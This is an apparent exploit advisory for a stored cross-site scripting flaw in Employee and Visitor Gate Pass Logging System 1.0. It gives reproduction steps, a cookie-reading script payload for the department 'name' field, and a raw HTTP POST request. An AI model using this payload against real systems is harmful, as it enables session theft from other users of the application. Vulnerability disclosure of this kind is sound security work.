Authored by Ilhami Selmet

Employee and Visitor Gate Pass Logging System version 1.0 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)
# Date: 10.11.2021
# Exploit Author: ─░lhami Selamet
# Vendor Homepage:
# Software Link:
# Version: v1.0
# Tested on: Kali Linux + XAMPP v8.0.12

Employee and Visitor Gate Pass Logging System PHP 1.0 suffers from a Cross Site Scripting (XSS) vulnerability.

Step 1 - Login with admin account & navigate to 'Department List' tab. - http://localhost/employee_gatepass/admin/?page=maintenance/department
Step 1 - Click on the 'Create New' button for adding a new department.
Step 2 - Fill out all required fields to create a new department. Input a payload in the department 'name' field - <script>alert(document.cookie)</script>
Step 3 - Save the department.

The stored XSS triggers for all users that navigate to the 'Department List' page.


POST /employee_gatepass/classes/Master.php?f=save_department HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------407760789114464123714007564888
Content-Length: 555
Origin: http://localhost
Connection: close
Referer: http://localhost/employee_gatepass/admin/?page=maintenance/department
Cookie: PHPSESSID=8d0l6t3pq47irgnbipjjesrv54

Content-Disposition: form-data; name="id"

Content-Disposition: form-data; name="name"

Content-Disposition: form-data; name="description"

Content-Disposition: form-data; name="status"